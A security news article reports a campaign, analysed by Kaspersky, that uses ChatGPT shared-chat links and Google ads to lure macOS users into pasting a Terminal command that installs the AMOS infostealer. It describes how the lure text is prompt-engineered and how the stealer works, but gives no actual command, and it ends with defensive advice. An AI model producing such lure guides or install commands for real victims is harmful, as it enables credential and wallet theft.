Cybercriminals have weaponized ChatGPT's legitimate chat-sharing feature to distribute the AMOS infostealer, creating a deceptively trustworthy infection vector that bypasses user skepticism by hosting malware instructions directly on OpenAI's official domain.
Kaspersky researchers uncovered the sophisticated campaign targeting macOS users searching for OpenAI's rumored Atlas browser. Attackers purchase Google ads that lead victims to chatgpt.com/share/ URLs—legitimate ChatGPT shared conversations that appear authoritative because they're hosted on the official website.
"What makes the attack so convincing is that the bait link leads to… the official ChatGPT website," Kaspersky experts noted in their analysis.
The threat actors use prompt engineering to manipulate ChatGPT into generating professional-looking installation guides, then sanitize the conversation history to remove suspicious exchanges. Victims see polished instructions for downloading "Atlas browser" that direct them to copy a command into Terminal—a classic ClickFix attack variation.
The malicious command downloads a script from atlas-extension{.}com that deploys AMOS (Atomic macOS Stealer), which harvests passwords, cookies, and data from Chrome, Firefox, crypto wallets like Electrum and Exodus, plus files from Desktop, Documents, and Downloads folders. AMOS also installs a persistent backdoor for remote system control.
This exploitation of content-sharing features follows a troubling pattern. Attackers have previously abused Dropbox, Google Docs, GitHub, and Google Forms to host malicious content on trusted domains, leveraging legitimate platform credibility to lower victim defenses.
The campaign highlights emerging risks as AI tools proliferate. Users excited about new technology may lack experience in distinguishing legitimate AI interactions from social engineering attacks dressed in AI clothing.
Protection requires vigilance: Never execute commands from websites, messages, or shared documents—regardless of how official they appear. If instructions prompt you to open Terminal or PowerShell, treat it as a potential ClickFix attack. When uncertain about suspicious commands, paste them into ChatGPT itself to analyze their function before execution.
Security experts recommend deploying reliable anti-malware protection across all devices and maintaining healthy skepticism toward unsolicited technical instructions, even when hosted on seemingly trustworthy platforms.